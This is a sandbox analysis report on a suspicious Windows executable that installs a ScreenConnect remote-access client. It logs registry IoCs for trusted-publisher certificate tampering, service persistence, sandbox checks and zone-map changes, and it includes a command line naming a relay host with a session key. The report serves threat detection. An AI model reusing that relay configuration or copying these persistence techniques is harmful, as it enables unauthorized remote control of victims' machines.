6b8b35c3f734f80a1fff238d7d02f72362d2c5c53d077d09b4a72a0ce7fe0979

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
27/05/2024, 07:21

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

24b92de6f1fa78d17586cc33516d2760_NeikiAnalytics.exe
Size

84KB
MD5

24b92de6f1fa78d17586cc33516d2760
SHA1

aafb98e8a2ce2d1bbb64dc5ec18769016f39cf70
SHA256

6b8b35c3f734f80a1fff238d7d02f72362d2c5c53d077d09b4a72a0ce7fe0979
SHA512

1cf1de5444e22969fb0507056bec084a86f6fe3e5c5d603998802c3d9bfa31bb380dafcf6cd642efac3ba8915f4befeea391248188bf7ae2644b2602c1ad1ad7
SSDEEP

1536:0azWlKzJVcNp++yQNS6xNNCT2l8NE8llbpTaCJRpsWr6cdaQTJSvYYm78Exj:AFNpo6rIKlUE8fbkqRfbaQlaYYmB

Score

8^/10

persistence

Malware Config

Signatures

Downloads MZ/PE file

Manipulates Digital Signatures 1 TTPs 4 IoCs

Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C\Blob = 0300000001000000140000007b0f360b775f76c94a12ca48445aa2d2a875701c2000000001000000b4060000308206b030820498a003020102021008ad40b260d29c4c9f5ecda9bd93aed9300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3231303432393030303030305a170d3336303432383233353935395a3069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e6720525341343039362053484133383420323032312043413130820222300d06092a864886f70d01010105000382020f003082020a0282020100d5b42f42d028ad78b75dd539591bb18842f5338ceb3d819770c5bbc48526309fa48e68d85cf5eb342407e14b4fd37843f417d71edaf9d2d5671a524f0ea157fc8899c191cc81033e4d702464b38de2087d347d4c8057126b439a99f2c53b1ff2efcb475a13a64cb3012025f310d38bb2fb08f08ae09d09c065a7fa98804935873d5119e8902178452ea19f2ce118c21accc5ee93497042328ffbc6ea1cf3656891a24d4c8211485268de10bd14575de8181365c57fb24f852c48a4568435d6f92e9caa0015d137fe1a0694c27cc8ea1b32e6cac2f4a7a3030e74a5af39b6ab6012e3e8d6b9f731e1dcade418a0d8c1234747b3a10f6ea3ab6d9806831bb76a672dd2bd441a9210818fb03b09d7c79b325ac2ff6a60548b49c193ede1b45ce06feb26f98cd5b2f93810e6eace91f5bed3fb6f9361345cbc93452883362a66285fb073ce8b262506b283d45cf615194ced62e05e33f2e8e8ec0aa7b0032b91b23679bef7ad081e75a665ccbbe34850f377911afedb50a246c8615898f57c02163c8328ad3986ecd4b70d53d0f847e675308dec30937614a65b4b5d74614d3f129176debf58cb72102941f0d5c56d267668114113589adc262b01f4894d59db78cf814a3e40475fc98150738510232159608a6454c1cc211ae838197c661ccd78384530994fff634f4cbbaa0d0853417c583d47b3fab6ec8c320902cc6c3c0c56110203010001a38201593082015530120603551d130101ff040830060101ff020100301d0603551d0e041604146837e0ebb63bf85f1186fbfe617b088865f44e42301f0603551d23041830168014ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300e0603551d0f0101ff04040302018630130603551d25040c300a06082b06010505070303307706082b06010505070101046b3069302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304106082b060105050730028635687474703a2f2f636163657274732e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63727430430603551d1f043c303a3038a036a0348632687474703a2f2f63726c332e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63726c301c0603551d20041530133007060567810c01033008060667810c010401300d06092a864886f70d01010c050003820201003a23443d8d0876ee8fbc3a99d356e0021aa5f84834f32cb6e67466f79472b100caaf6c302713129e90449f4bfd9ea37c26d537bc3a5d486d95d53f49f427bb16814550fd9cbdb685e0767e3771cb22f75aaa90cff5936ae3eb20d1d55079889a8a8ac1b6bda148187edcd8801a111918cd61998156f6c9e376e7c4e41b5f43f83e94ff76393d9ed499cf4add28eb5f26a1955848d51afed7273ffd90d17686dd1cb0605cf30da8eee089a1bd39e1384eda6ebb369dfbe521535ac3cae96af1a23edb43b833c84f38149299f5ddce546dd95d02141f40337c03e295b2c221757352cb46d8c4341ca2a54b8dcd6f76372c853f1ace26e918be9007b0437f9588208270f0cccaeffd29355c1f893855f7378a8b09a1cb0be9311aff2e195c3971e1be9ca70a06d62667b792e64e5fde7aac49cf2ea47492addb3ca49c861fe3c1561b2b23ff8fb5ea887b706be6a0bafd3a3f45a6c4e81691528b41c048844b964dab4440e38df01528ceedf11856072a2f10c40c08643c338fae288c3ccb8f880b0dbf3bf4ce1e7b8eefb5ebcbb7f07713e6e7283fac12aea52f226c41f9825c1566cc6c0ecac586c3f626330c074ba0d307026a6a4030484b34a85120bbad1b8508e2590d6dca05502bea4a1c9ea5fda0a71f0674e7f2d65290fdaf854821f9573bb49c03ed8645f4b4616ebf68e2266086eac8afa9fe941de7631b3a8656784e	24b92de6f1fa78d17586cc33516d2760_NeikiAnalytics.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579\Blob = 0300000001000000140000004c2272fba7a7380f55e2a424e9e624aee1c145792000000001000000640700003082076030820548a00302010202100b9360051bccf66642998998d5ba97ce300d06092a864886f70d01010b05003069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e67205253413430393620534841333834203230323120434131301e170d3232303831373030303030305a170d3235303831353233353935395a3065310b30090603550406130255533110300e06035504081307466c6f72696461310e300c0603550407130554616d706131193017060355040a1310436f6e6e656374776973652c204c4c433119301706035504031310436f6e6e656374776973652c204c4c4330820222300d06092a864886f70d01010105000382020f003082020a0282020100ec489826d08d2c6de21b3cd3676db1e0e50cb1ff75ff564e9741f9574aa3640aa8297294a05b4db68abd0760b6b05b50ce92ff42a4e390be776a43e9961c722f6b3a4d5c880bcc6a61b4026f9137d36b2b7e9b86055876b9fa860dbcb164fe7f4b5b9de4799ae4e02dc1f0bee01e5d032933a2827388f8db0b482e76c441b1bd50909ef2023e1fb62196c994ce052266b28cd89253e6416044133139764db5fc45702529536bf82c775f9ec81fa27dc409530325f40cdef95b81b9ce0d42791cee72e7bd1b36c257b52257c65a28970e457513989434bfc239e2992b193e1b3cc3f11ccdd1d26d4ec9845099ab913906a42069af999c0071169b45a2ea1aa666f1904e8acb05e1823a359a291fd46b4ef7aed5935bb6ab17ebf077210726930c90f01761d6544a94e8fa614cc41d817eec734b1c3d3afb7c58fb256f0c09edc1459bddbff9940ed1958570265d67af79a9b6a16affd70fc6328c9810d5dc186e39af6fbcad49a270f237e6bcd5de0bc014bc3179cd79776591340311a42ca94f33416c2e01b59bd1d71de86ace6716bc90b2d7695d155039aa08fbac19a4d93fb784230a20a485287a16355645fc09142c602d140fa046b7bfd75328184ff7bdf8f9e0d65e6201c8d242931047f59bd328ac353777ccefa60408887b84fc3631301463461a1d73c0b5cc74d6d82905ddf923bdbab027a311cc38d3fa16f639a50203010001a382020630820202301f0603551d230418301680146837e0ebb63bf85f1186fbfe617b088865f44e42301d0603551d0e04160414338ce10a6e06d9c6ed0bc6cae736cefb8188646a300e0603551d0f0101ff04040302078030130603551d25040c300a06082b060105050703033081b50603551d1f0481ad3081aa3053a051a04f864d687474703a2f2f63726c332e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c3053a051a04f864d687474703a2f2f63726c342e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c303e0603551d20043730353033060667810c0104013029302706082b06010505070201161b687474703a2f2f7777772e64696769636572742e636f6d2f43505330819406082b06010505070101048187308184302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d305c06082b060105050730028650687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820201000ad79f00cf4984864c8981ecce8718aa875647f6a74608c968e16568c7aa9d711ed7341676038067f01330c91621b27a2a8894c4108c268162a31f13f9757a7d6bb3c6f19bf27c3a29896d712d85873627d827cd6471761444fabf1d31e903f791143c5b4ce5e7444aacba36d759aeba3069d195226755cbc675aa747f77596c53c96e083c45bba24479d6845eea9f2b28ba29b4dcf0bcf14aa4ce176c24e2c1b8fec3ee16e1c086db6fda97388859e83be65c03f701395b78b842c6dd1533ef642cca6fe50f6337d3f2dfedd8b28f2b28e0c98edd2151392e7cc75489f48859f1de14c81b306eb50eed7bb78be30eaada76767c4ca523a11eec5a2372d6122926ab1801a6a6778e9504791487ee47d4577154988802070f80fc535957658f954cd083546c5afb5a6567b6761275f5db20f70ab86feef94c7cfc65369d325121b69a82399bc7dc1962416f0f05cf1eee64d495a3527e464e2c68da0187093f97b673e43dddbcc067e00713f1565fcff8c3772d44b40a04e600644f22a990345f9a6b5b52963e82c81a0ce91d43a230f67b37d8debda40ea3d59d305e18adc1976516c12a8ba2bca24143b12e9527b4dca58872aa9b3a8c6ac563fc2dc02bf51be889516d35a4ba9d062417b5bdcc50ba945fae26b60d6aec03984798a6a21d3ff793cc0849e81ed55b8027411c50db776ae8feef2fdc2dafb04345261dedc054	24b92de6f1fa78d17586cc33516d2760_NeikiAnalytics.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C	24b92de6f1fa78d17586cc33516d2760_NeikiAnalytics.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579	24b92de6f1fa78d17586cc33516d2760_NeikiAnalytics.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (02246d46-0755-460e-985e-726dc761d255)\ImagePath = "\"C:\\Users\\Admin\\AppData\\Local\\Apps\\2.0\\H3R4XA9R.MY5\\MMLQA5HQ.TMM\\scre..tion_25b0fbb6ef7eb094_0018.0001_867cd7c79f6dad8c\\ScreenConnect.ClientService.exe\" \"?e=Support&y=Guest&h=instance-yp0dwd-relay.screenconnect.com&p=443&s=02246d46-0755-460e-985e-726dc761d255&k=BgIAAACkAABSU0ExAAgAAAEAAQC5GvbvcZAxIpD9TgcZwBfMfBxwQcJXJq7riox3Anold6J1P35iiqPjMDsbijlKCx5INOyiK6NmNmeSgaSzG320lHwXxuq4DjEotVaevAfY974RZb3WSLkwhwCp1ajm48bYTByPIdNvzESe7rTNSjg%2b8BoPZ2zwKtQwvzoRoTxfMKJjijYmvqFM3XGJ5%2bxQOOBkAuUqyhoIkesPDtUJBNTeLdnzm3UL3da6dDMfOwQzybXA9s5MMf8x5NEUK6xoggkgFEjWieQ%2fk4WYeDYwwIhCDPfcRt3rQt4bckvMp%2fjVdkp%2fNQEfihtgRR%2bEKR8QevihYFK%2bLKxeMmmZc6TjKPDa&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAZZOx9z9OqUWQcu7XdgLyLQAAAAACAAAAAAAQZgAAAAEAACAAAAC%2bFPdVInJHwBQIeIVgf7CMrij42ZUMhRWXYTf2h8j2ywAAAAAOgAAAAAIAACAAAABPLadnfud8in9IFL37i5jPnU8RMFMo4JIcIf4k79xI5KAEAADN03pnds%2fC7fwPHFJRIhslbMz3g3lI5NIzPGDQA%2b%2bY6oDAC26UCxpaHDPoQA%2fxTfDfkN5Bz87RF0%2fUzFYZxOroNnTmLhjjDBwBoDUjXIK3%2fj%2fxbnLzhCKEaBNurq0N1FVG1GlSB%2fhZ5xgkd%2fbVE%2ftnv7Gc3p4x2J0AaSqWhneJRZA4OhULvzdlhqQ2IDYfaNZg2u8gZdyefeC6SLPUHRwMu87BKJa3zl7LhYPqGGA%2bwz1ljU983%2fw1rtzBEWELG%2fy6gSyRoFLVCnE4Fj%2fjDcPbHxnq0nBiwhnM0HVCoHW04JfTfh6i34NBwRbXmWHf7UI%2fx%2f75eTwexwkJPUPdFxUa85TbdS1w99AC3xkQ8tfJher9T5SYvzpvNAn%2ftN5KeGjzLh5hWjFWi5bxBUp%2bbbqCR1U2XkA5s%2fCnCD%2fMEUDGALn51w%2b7gprRPXvgJ%2f7qRe%2br6eyb8fltMVVovSMOnj5%2fd%2bNPRM9QBz3hLdlSFfa3F2e5Gf8E92SIsP7LfLTptGcRz1NHT0lMhSeYfnTxf4tJ41CDXyFegXSm641SngroNhXhSaYitCN2ospBRUQ8wwpviEYx6FoYoMRdP9uCtHxfXEvbwNoRqwEkhvF1qiDOYgR0sY1%2b0F18dBYbZTS%2bXW8WWLxmWqXc7oOtDhBq7nb4zQgwvxi47HmIbF9srQSPLX1GMOGDQlwhuezsnb9tbrDGL8tDcLa76skAH5Ci6QlvVYYhugTjSYkZ5fLBvyv0ghXln9kf%2fUipfel99z7kpFWRGf3fY3j4FNcjfvtJ9I%2bCDfnYxcbtTz5h324ZxMk%2fMwodmAXc%2fnBdBtYp7Bnyy7k4eCAE8gcTj2R6NvpWotyFHumWm1zb6%2b4Ij4tI5SPMKUzeBQXOibdnDtjTkDx%2fyekQrt7Wpfw5eeiqnk%2bisfb4lTSR649shWelU%2fKZ3S5A4JyOpc2oKzk83awKHxJJxdO9Z5aQbht9ChwqmtC%2bdTB%2bMFtTeEICcDHhzlz44ypTChmwljDCnfZnBs%2bzh7XQEPvNgRuKsM%2fNJF11V8oxdV60EGCCVCQy1aA4Z8%2fnx4XeWdl2QjcVpgNHKkepvUqSejVLYmHygiy5NFq226VBqRe9u2Q1ZQ9LjvZynPRFzJWzggvF7jcNexZF4siDeziMg7%2bF4tUlfB27587xbXwRJC2%2f%2fYMP%2f0FnuRLxKIJzIk725dFdDS0cn39C85y7qtKHRABI3atgAan%2b6ffkmf5613pOkiH1by2SuXf%2f5ELL2OrR27vqlncBDZ2Dxnj0tx0p8eQC5eSFOk8X4vu607Vr4yEjX7GizC0CHE2yRYpQXwwb00S6YmDy9cr1gAuYRQgDLCaUEujQSqQmRNHiDgLcGN9m81mTKHDWRAFUWmvBSGb486uaBwjjyVDQReb5A6Ih1FZQIa%2fCvS5v%2fjvwRwdJdE6o77LmeL1Mn61lPcs4b775KR%2b7gK4JG28g8k9pqTgyXyJLJJ89ek5OJ%2fNMS8qhzwjlQIl%2bjA8eIWKknoeeKRmPpk2AYjmYwviehZ1m%2bxCOPkzhEd7fVf2V37GBsSrEimvSEJlrw2Eqm5j2ht51gT9XvEAAAADllVFUTgGaVw7kLl8nlyVjOqvyzEXNeQ4diqYxLc%2bZ9MesdoBaaCY624WoZdyt1AhYdof0hAxw2olyeok3n%2fpZ&r=%2f&i=Untitled%20Session\" \"1\""	ScreenConnect.ClientService.exe

Executes dropped EXE 5 IoCs

pid	Process
832	ScreenConnect.WindowsClient.exe
3052	ScreenConnect.ClientService.exe
4288	ScreenConnect.ClientService.exe
1028	ScreenConnect.WindowsClient.exe
1732	ScreenConnect.WindowsClient.exe

Loads dropped DLL 16 IoCs

pid	Process
3052	ScreenConnect.ClientService.exe
3052	ScreenConnect.ClientService.exe
3052	ScreenConnect.ClientService.exe
3052	ScreenConnect.ClientService.exe
3052	ScreenConnect.ClientService.exe
3052	ScreenConnect.ClientService.exe
4288	ScreenConnect.ClientService.exe
4288	ScreenConnect.ClientService.exe
4288	ScreenConnect.ClientService.exe
4288	ScreenConnect.ClientService.exe
4288	ScreenConnect.ClientService.exe
4288	ScreenConnect.ClientService.exe
4288	ScreenConnect.ClientService.exe
4288	ScreenConnect.ClientService.exe
4288	ScreenConnect.ClientService.exe
4288	ScreenConnect.ClientService.exe

Drops file in System32 directory 3 IoCs

description	ioc	Process
File created	C:\Windows\system32\user.config	ScreenConnect.WindowsClient.exe
File opened for modification	C:\Windows\system32\user.config	ScreenConnect.WindowsClient.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log	ScreenConnect.WindowsClient.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	ScreenConnect.WindowsClient.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	ScreenConnect.WindowsClient.exe

Modifies data under HKEY_USERS 10 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	ScreenConnect.ClientService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	ScreenConnect.WindowsClient.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Visibility	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0018.0001_none_57acd8973addaa0f	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0018.0001_none_048898fe944efa4a\lock!0a0000004258570ec80c0000e80e0000000000000000000 = 30303030306363382c30316461623030363730366537643037	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\F_scre..tion_25b0fbb6ef7eb094_fca0185e7b0779c6	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0001_none_b47bd9d9e77379ec\lock!0a000000ce58570e400300002c130000000000000000000 = 30303030303334302c30316461623030363732396462346665	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0001_none_e94a5e880ddeece3\DigestMethod = 01	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0001_2db738d27c97c41b\scre...exe_25b0fbb6ef7eb094_0018.0001_none_97cb9f2a4	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0001_none_b47bd9d9e77379ec\Transform = 01	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0018.0001_none_048898fe944efa4a	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0001_none_97cb9f2a42c4956b	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Installations	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0001_none_533500b5fe8f96df\Files	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0001_none_97cb9f2a42c4956b	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications\scre..tion_25b0fbb6ef7eb094_0018.0001_867cd7c79f6dad8c\identity = 68747470733a2f2f746568696832383736382e73637265656e636f6e6e6563742e636f6d2f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32342e312e372e383839322c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2f53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6578652c2056657273696f6e3d32342e312e372e383839322c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2c20747970653d77696e3332	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0001_none_97cb9f2a42c4956b\lock!12000000de58570e400300002c130000000000000000000 = 30303030303334302c30316461623030363732396462346665	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0001_867cd7c79f6dad8c	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0001_none_97cb9f2a42c4956b\identity = 53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6578652c2056657273696f6e3d32342e312e372e383839322c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2c20747970653d77696e3332	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0001_none_533500b5fe8f96df	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0001_none_38bfd8c0a9435f4e\lock!040000004258570ec80c0000e80e0000000000000000000 = 30303030306363382c30316461623030363730366537643037	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0018.0001_none_533500b5fe8f96df\lock!0c000000ce58570e400300002c130000000000000000000 = 30303030303334302c30316461623030363732396462346665	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb = 680074007400700073003a002f002f0074006500680069006800320038003700360038002e00730063007200650065006e0063006f006e006e006500630074002e0063006f006d002f00420069006e002f00530063007200650065006e0043006f006e006e006500630074002e0043006c00690065006e0074002e006100700070006c00690063006100740069006f006e002300530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f007700730043006c00690065006e0074002e006100700070006c00690063006100740069006f006e002c002000560065007200730069006f006e003d00320034002e0031002e0037002e0038003800390032002c002000430075006c0074007500720065003d006e00650075007400720061006c002c0020005000750062006c00690063004b006500790054006f006b0065006e003d0032003500620030006600620062003600650066003700650062003000390034002c002000700072006f0063006500730073006f0072004100720063006800690074006500630074007500720065003d006d00730069006c002f00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f007700730043006c00690065006e0074002e006500780065002c002000560065007200730069006f006e003d00320034002e0031002e0037002e0038003800390032002c002000430075006c0074007500720065003d006e00650075007400720061006c002c0020005000750062006c00690063004b006500790054006f006b0065006e003d0032003500620030006600620062003600650066003700650062003000390034002c002000700072006f0063006500730073006f0072004100720063006800690074006500630074007500720065003d006d00730069006c002c00200074007900700065003d00770069006e00330032000000	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\VisibilityRoots	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0001_867cd7c79f6dad8c\scre..ient_4b14c015c87c1ad8_0018.0001_none_b47bd9d9e = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0001_none_e94a5e880ddeece3\identity = 53637265656e436f6e6e6563742e436c69656e742c2056657273696f6e3d32342e312e372e383839322c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d344231344330313543383743314144382c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0001_none_e94a5e880ddeece3\lock!1c000000de58570e400300002c130000000000000000000 = 30303030303334302c30316461623030363732396462346665	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0001_none_533500b5fe8f96df\Files\ScreenConnect.Core.dll_b96889d378047e27 = 01	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components	ScreenConnect.WindowsClient.exe
